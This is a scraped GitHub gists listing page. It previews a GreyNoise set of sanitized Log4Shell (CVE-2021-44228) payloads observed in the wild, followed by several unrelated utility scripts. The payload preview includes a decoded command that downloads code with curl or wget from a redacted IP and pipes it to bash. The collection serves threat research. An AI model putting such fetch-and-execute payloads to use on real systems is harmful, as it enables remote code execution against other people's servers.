nate nathanqthai

nathanqthai /
Last active May 2, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence


Enclosed are some sanitized samples of data GreyNoise has identified and collected related to exploitation of the Log4J vulnerability in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples do not comprehensively cover all the payloads GreyNoise has observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.


The following section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

nathanqthai / base64_payloads.csv
Last active Mar 18, 2022
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s<IP_ADDRESS>||wget -q -O-<IP_ADDRESS>)|bash 2056
(curl -s||wget -q -O-|bash 162
(curl -s||wget -q -O-|bash 2
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :
import argparse
import logging
import time
import greynoise
import collections
nathanqthai /
Created Jul 11, 2019
an example of a tmux workspace setup script
# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter
tmux split-window -h -p 40
tmux send-keys 'htop' Enter
nathanqthai /
Created May 22, 2019
connect to wifi
[ "`whoami`" = root ] || exec sudo "$0" "$@"
wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}
nathanqthai /
Created May 16, 2019
CLI preview for Markdown editing
# sudo apt install ruby inotify-tools
# gem install mdless
# refreshing preview of markdown files
mdlive() {
while true; do
inotifywait -q -e close_write $1;
nathanqthai / Vagrantfile
Last active May 16, 2019
A Vagrantfile for provisioning a VM with Ghidra and X11 forwarding enabled.
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
# ubuntu 18.04 lts = "ubuntu/bionic64"
config.vm.provider "virtualbox" do |v|
v.memory = 4096
nathanqthai /
Last active Mar 20, 2019
a git pre-commit hook to check for API keys
# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index $STASH_NAME
# regexes to find keys
nathanqthai / 38khz_adc.ino
Created Sep 24, 2017
idk im a dumpster fire atm
void setup() {
Serial.begin(115200); // use the serial port
TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
ADCSRA = 0xe5; // set the adc to free running mode
ADMUX = 0x40; // use adc0
DIDR0 = 0x01; // turn off the digital input for adc0
void loop() {
byte buf[256];
nathanqthai / readme.txt
Last active Aug 31, 2017
simple tornado server with ssl
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x
test server:
openssl s_client -connect localhost:8888